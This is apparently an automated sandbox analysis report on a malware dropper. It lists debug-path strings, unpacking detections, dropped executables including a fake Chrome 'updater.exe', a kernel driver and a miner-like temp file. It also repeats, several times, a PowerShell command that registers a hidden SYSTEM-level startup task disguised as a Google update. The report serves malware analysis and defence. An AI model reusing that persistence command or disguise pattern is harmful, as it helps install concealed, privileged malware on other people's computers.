                          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: Loader.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: EfiGuardDxe.pdb7 source: e0cbefcb1af40c7d4aff4aca26621a98.exe
                          Source: Binary string: Unrecognized pdb formatThis error indicates attempting to access a .pdb file with source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: A connection with the server could not be establishedAn extended error was returned from the WinHttp serverThe .pdb file is probably no longer indexed in the symbol server share location. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Age does not matchThe module age and .pdb age do not match. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: symsrv.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe
                          Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Unable to locate the .pdb file in this location source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: The module signature does not match with .pdb signature. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: .pdb.dbg source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: '(EfiGuardDxe.pdbx source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: symsrv.pdbGCTL source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.00000000040D8000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000C7A000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000037E9000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: or you do not have access permission to the .pdb location. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: EfiGuardDxe.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003CA2000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000843000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.00000000033B3000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: Signature does not matchThe module signature does not match with .pdb signature source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: dbghelp.pdb source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp
                          Source: Binary string: dbghelp.pdbGCTL source: e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4559431109.0000000000ACD000.00000040.00000001.01000000.00000009.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000003.2160724822.0000000003F2B000.00000004.00001000.00020000.00000000.sdmp, e0cbefcb1af40c7d4aff4aca26621a98.exe, 00000005.00000002.4576083277.000000000363C000.00000040.00001000.00020000.00000000.sdmp

                          Data Obfuscation

                          barindex
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeUnpacked PE file: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeUnpacked PE file: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeUnpacked PE file: 5.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.5.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeUnpacked PE file: 9.2.toolspub2.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeUnpacked PE file: 17.2.e0cbefcb1af40c7d4aff4aca26621a98.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                          Source: C:\Users\user\AppData\Roaming\cdttvvcUnpacked PE file: 59.2.cdttvvc.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }Jump to behavior
                          Source: C:\Program Files\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                          Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#mgttsuddg#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_0040B895 push ecx; ret 3_2_0040B8A8
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00408FD9 push ecx; ret 3_2_00408FEC
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_0083198B push ebx; iretd 3_2_008319B7
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00831970 push ebx; iretd 3_2_008319B7
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00831977 push ebx; iretd 3_2_008319B7
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_0095E1A3 pushad ; iretd 3_2_0095E1A9
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00959317 push ebx; iretd 3_2_00959342
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_00959302 push ebx; iretd 3_2_00959342
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeCode function: 5_2_02B6FC85 pushad ; ret 5_2_02B6FC97
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeCode function: 5_2_02B6FD61 pushad ; ret 5_2_02B6FD88
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeCode function: 5_2_02B6D16B pushfd ; ret 5_2_02B6D1B3
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 9_2_004011D0 push ebx; iretd 9_2_00401217
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 9_2_004011D7 push ebx; iretd 9_2_00401217
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 9_2_004011EB push ebx; iretd 9_2_00401217
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeCode function: 17_2_02B1AC85 pushad ; ret 17_2_02B1AC97
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeCode function: 17_2_02B1AD61 pushad ; ret 17_2_02B1AD88
                          Source: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeCode function: 17_2_02B1816B pushfd ; ret 17_2_02B181B3
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD3477D2A5 pushad ; iretd 26_2_00007FFD3477D2A6
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD34893A36 pushad ; ret 26_2_00007FFD34893AC9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD34893A79 pushad ; ret 26_2_00007FFD34893AC9
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD348922C5 push eax; iretd 26_2_00007FFD3489233D
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 26_2_00007FFD34897B8B push eax; ret 26_2_00007FFD34897B99
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 57_2_00A5198B push ebx; iretd 57_2_00A519B7
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 57_2_00A51977 push ebx; iretd 57_2_00A519B7
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 57_2_00A51970 push ebx; iretd 57_2_00A519B7
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 57_2_00A8E0D3 pushad ; iretd 57_2_00A8E0D9
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 57_2_00A89232 push ebx; iretd 57_2_00A89272
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 57_2_00A89247 push ebx; iretd 57_2_00A89272
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 59_2_004011D0 push ebx; iretd 59_2_00401217
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 59_2_004011D7 push ebx; iretd 59_2_00401217
                          Source: C:\Users\user\AppData\Roaming\cdttvvcCode function: 59_2_004011EB push ebx; iretd 59_2_00401217
                          Source: C:\Users\user\AppData\Local\Temp\toolspub2.exeCode function: 3_2_004124B2 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_004124B2
                          Source: latestX.exe.0.drStatic PE information: section name: .xdata
                          Source: Broom.exe.2.drStatic PE information: section name: .didata
                          Source: updater.exe.6.drStatic PE information: section name: .xdata
                          Source: whxcdqscjswq.tmp.39.drStatic PE information: section name: _RANDOMX
                          Source: whxcdqscjswq.tmp.39.drStatic PE information: section name: _TEXT_CN
                          Source: whxcdqscjswq.tmp.39.drStatic PE information: section name: _TEXT_CN
                          Source: whxcdqscjswq.tmp.39.drStatic PE information: section name: _RDATA
                          Source: e0cbefcb1af40c7d4aff4aca26621a98.exe.0.drStatic PE information: real checksum: 0x42e75a should be: 0x43417d
                          Source: updater.exe.6.drStatic PE information: real checksum: 0x59d840 should be: 0x5a15bb
                          Source: latestX.exe.0.drStatic PE information: real checksum: 0x59d840 should be: 0x5a15bb
                          Source: Broom.exe.2.drStatic PE information: real checksum: 0x0 should be: 0x55278a
                          Source: InstallSetup5.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x28f890
                          Source: whxcdqscjswq.tmp.39.drStatic PE information: real checksum: 0x0 should be: 0x554c2a
                          Source: initial sampleStatic PE information: section name: .text entropy: 7.3194322773212415
                          Source: initial sampleStatic PE information: section name: .text entropy: 7.3194322773212415

                          Persistence and Installation Behavior

                          barindex
                          Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sys
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\cdttvvcJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\toolspub2.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\latestX.exeFile created: C:\Program Files\Google\Chrome\updater.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\latestX.exeJump to dropped file
                          Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\cdttvvcJump to dropped file
                          Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\whxcdqscjswq.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exeJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeFile created: C:\Users\user\AppData\Local\Temp\Broom.exeJump to dropped file
                          Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\InstallSetup5.exeJump to dropped file
                          Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Program Files\Google\Libs\WR64.sysJump to dropped file
                          Source: C:\Program Files\Google\Chrome\updater.exeFile created: C:\Windows\Temp\whxcdqscjswq.tmpJump to dropped file
